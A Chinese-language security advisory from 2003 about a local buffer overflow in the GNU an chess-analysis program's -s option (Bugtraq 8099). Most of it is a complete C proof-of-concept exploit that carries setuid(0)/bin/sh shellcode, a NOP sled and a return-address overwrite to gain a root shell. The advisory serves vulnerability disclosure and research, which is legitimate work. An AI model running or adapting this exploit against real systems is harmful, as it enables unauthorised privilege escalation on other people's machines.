安全研究

安全漏洞
GNU an程序本地命令行选项缓冲区溢出漏洞

发布日期:2003-07-03
更新日期:2003-07-11

受影响系统:
GNU an
描述:
BUGTRAQ  ID: 8099

GNU an是一款分析国际象棋游戏的程序。

GNU an不正确处理-s命令行选项,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。

攻击者提交超过580字节的数据给-s命令行选项,可触发缓冲区溢出,根据安装情况,可能以高权限执行任意指令。不过GUN an一般不以SUID属性安装。

<*来源:t0asty (t0asty@static-x.org
  
  链接:http://www.securityfocus.com/bid/8099
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

t0asty (t0asty@static-x.org)提供了如下测试方法:

/*

  STX SECURITY LABS:

  5358gnuanx0r.c - x86 local buffer overflow exploit
  proof of concept code by: ace [ ace@static-x.org ]
  vulnerability discovered by: t0asty [ t0asty@static-x.org ]

  Description:

  gnuan produces an analysis of a chess game. For each move it shows the move,
  the score and the principle variation selected by gnuchess.

  Vulnerability:

  A buffer overflow vulnerability is present in gnuan.
  A segmentation fault occurs when 580 bytes of data are sent to
  the binary using the -s switch. The data overwrites the EIP therefore
  it allows us to control the pointer, allowing us to execute code.
  
  Versions vulnerable:

  [-] All versions are believed to be vulnerable.
      Tested on: Red Hat 7.3 with the latest version.

  ************************************************
  * Note: gnuan may not be suid on all systems.  *
  ************************************************

  StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS
  X                                        X
  X STX ONLINE [ www.static-x.org ]        X
  X                                        X
  StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS

  ************************************************
  * Note: our pen0rs are 50 x larger than yours. *
  ************************************************

*/

#include <stdio.h>

char stxcode[] =

     /* ace's shellcode [ ace@static-x.org ] (setuid=0,/bin/sh) */
     "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x03\x5e\xeb\x05\xe8\xf8\xff"
     "\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x50\x80\x36\x01\x46\xe2\xfa\xea"
     "\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01\x54"
     "\x88\xe4\x82\xed\x11\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xb6"
     "\x11\x01\x01\x8c\xb2\x2f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01"
     "\x88\x74\xf9\x8c\x4c\xf9\x30\xd3\xb9\x0a\x01\x01\x01\x52\x88\xf2"
     "\xcc\x81\x5a\x5f\xc8\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91";


unsigned long pen0r(void)

{
__asm__("movl %esp, %eax");
}

int main(int argc, char **argv) {

int pos; int ace = pen0r(); int stxnop = 0x90;
int stxbytes = 576; int stxtotal = stxbytes + 4;
char *stxbof;
stxbof = (char *)malloc(stxbytes);

for(pos = 0; pos < stxbytes; pos++) {*(long *)&stxbof[pos] = stxnop;}
*(long *)&stxbof[stxbytes] = pen0r();
memcpy(stxbof + stxbytes - strlen(stxcode), stxcode, strlen(stxcode));

system("clear");
printf("#####################################\n");
printf("#        [ STX SECURITY LABS ]      #\n");
printf("#  gnuan local poc exploit by: ace  #\n");
printf("#####################################\n\n");
printf("[+] Return Address: 0x%x\n", ace);
printf("[+] Buffer Size: %d\n", stxtotal);
printf("[-] /usr/bin/gnuan -s pwned!\n\n");

execl("/usr/bin/gnuan", "gnuan", "-s", stxbof, NULL);

return 0;

}

建议:
厂商补丁:

GNU
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.gnu.org

浏览次数:2871
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障